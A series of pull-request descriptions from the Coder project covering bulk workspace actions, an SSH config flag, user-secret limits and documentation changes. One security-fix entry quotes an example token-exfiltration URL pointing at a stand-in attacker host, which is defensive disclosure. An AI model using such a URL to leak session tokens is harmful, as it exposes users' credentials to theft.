Previously, bulk start required every selected workspace to be stopped,
and bulk stop required every selected workspace to be running. Mixed
selections disabled both buttons entirely.
- Change the disabled checks on bulk start/stop from `every()` to
`some()` so the buttons are enabled when at least one workspace is
eligible.
- Filter workspaces by status in the mutation functions so only eligible
workspaces are sent to the API, matching the pattern used by other batch
mutations (update, favorite, unfavorite).
- Update docs to reflect the new behavior.

<summary>Implementation plan</summary>
## Problem
When an admin selects multiple workspaces and opens the "Bulk actions"
dropdown, the **Start** menu item is disabled unless *every* selected
workspace has `latest_build.status === "stopped"`. If even one workspace
is already running (or in any other non-stopped state), the Start button
is grayed out and unusable. Same issue applies to **Stop**.
## Changes
### 1. Relax disabled condition (`WorkspacesPageView.tsx`)
Changed `every()` to `some()` for both Start and Stop dropdown items.
The buttons are now enabled when at least one selected workspace is in
the target state.
### 2. Filter in mutations (`batchActions.ts`)
Added `.filter()` before `.map()` in both `startAllMutation` and
`stopAllMutation` so only eligible workspaces hit the API. This matches
the existing pattern in `updateAllMutation`, `favoriteAllMutation`, and
`unfavoriteAllMutation`.
### 3. Update documentation (`docs/user-guides/workspace-management.md`)
Replaced "can only be applied to a set of workspaces which are all in
the same state" with "apply to eligible workspaces in the selection,
skipping workspaces that are already in the target state."
## Testing
Four new Storybook stories:
| Story | What it tests |
|-------|---------------|
| `StartIgnoresAlreadyRunningWorkspaces` | Mixed selection; only stopped
workspaces get `startWorkspace` calls |
| `StopIgnoresAlreadyStoppedWorkspaces` | Mixed selection; only running
workspaces get `stopWorkspace` calls |
| `StartDisabledWhenNoWorkspacesAreStartable` | All running; Start
button is disabled |
| `StopDisabledWhenNoWorkspacesAreStoppable` | All stopped; Stop button
is disabled |

Add `--no-wildcard` (`CODER_CONFIGSSH_NO_WILDCARD`) to `coder
config-ssh` that generates an individual `Host` entry per workspace
instead of a single wildcard block (`Host *.coder`).
The wildcard approach cannot be enumerated by third-party SSH clients,
the VS Code Remote-SSH sidebar, or scripts that parse `~/.ssh/config` to
discover hosts. With `--no-wildcard`, each workspace gets its own entry
so those tools work without Coder-specific extensions.
The flag is persisted in the config section header so re-running without
it prompts the user about the option change. Workspaces are fetched with
pagination before writing so the diff shows actual hostnames.
## Manual testing
**Unit tests (no server needed):**
```sh
go test ./cli/ -run TestSSHConfigOptions_writeToBuffer -v
go test ./cli/ -run TestConfigSSH_NoWildcard -v
```
**End-to-end with a dev server:**
1. Build: `go build -o ./coder .`
2. Start dev server in a separate terminal: `./scripts/develop.sh`
3. Log in: `./coder login http://localhost:3000`
4. Create two workspaces
5. Run both variants into temp files:
```sh
./coder config-ssh --no-wildcard --hostname-suffix coder --ssh-config-file /tmp/test-ssh-config --yes
./coder config-ssh --hostname-suffix coder --ssh-config-file /tmp/test-ssh-config-wildcard --yes
diff /tmp/test-ssh-config-wildcard /tmp/test-ssh-config
```

Closes https://github.com/coder/coder/issues/17153 (Phase 1: CLI flag)
`coder open app` substituted the user's session token into any external
workspace-app URL containing `$SESSION_TOKEN` before opening, letting a
malicious sub-agent exfiltrate the token via a URL like
`https://attacker.example/?t=$SESSION_TOKEN`.
Substitution is now restricted to URLs from top-level
(template-authored) agents. Sub-agent URLs that still contain
`$SESSION_TOKEN` are printed for the user to inspect and substitute
manually rather than opened automatically. Sub-agent URLs without the
placeholder are unaffected.
Update the user secrets user guide, the admin security secrets
reference, and the docs manifest to label the feature as Beta instead of
Early Access, and link to the beta section of the feature stages doc.
Add a Postgres trigger and matching codersdk constants that cap each
user's secrets in four dimensions: count (50), total stored value bytes
(200 KiB), env-injected stored value bytes (24 KiB), and env name length
(256 bytes). Without these caps a user could overflow the 4 MiB DRPC
agent manifest, the ~32 KiB Windows process env
block, or Linux/macOS ARG_MAX at workspace start. The trigger is the
source of truth on aggregates; the handler maps its check_violation
error into a 400 that names the per-user budget in stored
(post-encryption) bytes. A handler test exercises off-by-one at each cap
across POST and PATCH, plus per-user budget isolation.
Generated with help from Coder Agents.
Adds the account settings UI for managing user secrets, including the
table, add/edit/delete dialog, Storybook coverage, and route/sidebar
entry.
Also updates the shared `FeatureStageBadge` beta variant with
dedicated beta styling, sizing, and label casing for the Secrets
page.
Stacked on #25370.
_This PR was generated by Coder Agents._
Replace the brief runtime-behavior paragraph with a dedicated section
covering when env and file secrets appear in a workspace, what the
running workspace sees, and how create/update/delete propagate. Call out
that Coder never explicitly removes secret files it has written, so deleting a
secret or changing its file path may leave the previous file on disk.

Felt wrong to only make use of Geist when there is a Monospace variant
here too. Felt best we default to this as the default font as its inline
with the rest of the application. This also updates the lower line for
Workspace Statistics 🙂
Closes#21130
Adds documentation for Google Antigravity IDE integration, following the
same pattern as Cursor and Windsurf (dedicated page for desktop IDEs).
**Changes:**
- `docs/user-guides/workspace-access/antigravity.md` — New dedicated
page with install guide, Coder extension setup, and template
configuration example using the [Antigravity registry
module](https://registry.coder.com/modules/coder/antigravity)
- `docs/user-guides/workspace-access/index.md` — Added Antigravity IDE
section alongside Cursor and Windsurf
- `docs/manifest.json` — Added sidebar navigation entry after Windsurf
Antigravity uses the `antigravity://` protocol (added in #20873) and the
built-in `/icon/antigravity.svg` icon (added in #21068). The [registry
module](https://registry.coder.com/modules/coder/antigravity) wraps
`vscode-desktop-core` with `protocol = "antigravity"`.

Adds support for filtering workspaces by health status using
healthy:true or healthy:false in the search query.
This is done by changing `has-agent` to accept a list of statuses and
aliasing `health:true` to `has-agent:connected` and `healthy:false` to
`has-agent:timeout,disconnected`.
Fixes#21623
## Summary
Adds documentation for the "disable automatic updates" feature in Coder
Desktop.
This adds a new "Administrator Configuration" section to the Coder
Desktop docs that documents:
- **macOS**: Setting the `disableUpdater` UserDefaults key via MDM or
`defaults` command
- **Windows**: Setting the `Updater:Enable` registry value in
`HKLM\SOFTWARE\Coder Desktop\App`
The feature already exists in both platforms but was not documented in
the user-facing docs.
## Changes
- Added new "Administrator Configuration" section before
"Troubleshooting"
- Documented macOS MDM configuration for disabling updates
- Documented Windows registry configuration for disabling updates
- Mentioned the `ForcedChannel` option for locking update channels

Also deletes the outdated devcontainer-agent-ports.png.
Refs #21157
The user guide jumped straight into integration details without explaining
what dev containers are. Now it opens with a brief orientation linking to
the spec, then explains this guide covers the Docker-based approach.
Converted several NOTE callouts to prose where they were just cross-references
or stacked unnecessarily. The Envbuilder index note was reframed to lead with
its strengths rather than "we recommend the other thing."
Also updates platform support to Linux only per current status.
Refs #21157
Dev container admin docs were scattered across two locations: the Docker-based
integration under extending-templates/ and Envbuilder under managing-templates/.
There was no landing page explaining that two approaches exist or helping admins
choose between them.
This moves everything under admin/integrations/devcontainers/ with a decision
guide at the top. Dev containers are an integration with the dev container
specification, so integrations/ is a natural fit alongside JFrog, Vault, etc.
Stub pages remain at the original locations for discoverability.

docs: rewrite dev containers documentation for GA
Corrects inaccuracies in SSH examples (deprecated `--container` flag),
port forwarding (native sub-agent forwarding is primary), and
prerequisites (dev containers are on by default). Fixes template
descriptions: docker-devcontainer uses native Dev Containers while
AWS/Kubernetes templates use Envbuilder.
Renames admin docs folder from `devcontainers/` to `envbuilder/` to
reflect actual content. Adds customization guide documenting agent
naming, display apps, custom apps, and variable interpolation. Documents
multi-repo workspace support and adds note about Terraform module
limitations with sub-agents. Fixes module registry URLs.
Refs #18907
Updates the dev containers documentation to accurately reflect that the
feature is generally available and document all configuration options.

🤖 PR was written by Claude Sonnet 4.5 Thinking using [Coder
Mux](https://github.com/coder/cmux) and reviewed by a human 👩
I ended up on the Coder Desktop docs page and thought half of it had disappeared, though it was actually tucked away behind a second page. This PR adds a next steps section to the first page that links there, as it seems very easy to miss right now.
I just added support for rendering GFM alerts inside of numbered lists
in coder.com (see https://github.com/coder/coder.com/pull/328), and
noticed that these plain blockquotes should probably be alerts.
This should cover all the missing alerts. I found them by searching for
the regex `^\s*>\s` within docs/**/*.md
Is `[!NOTE]` the correct type for these? Or do we want to use
tip/important/etc?
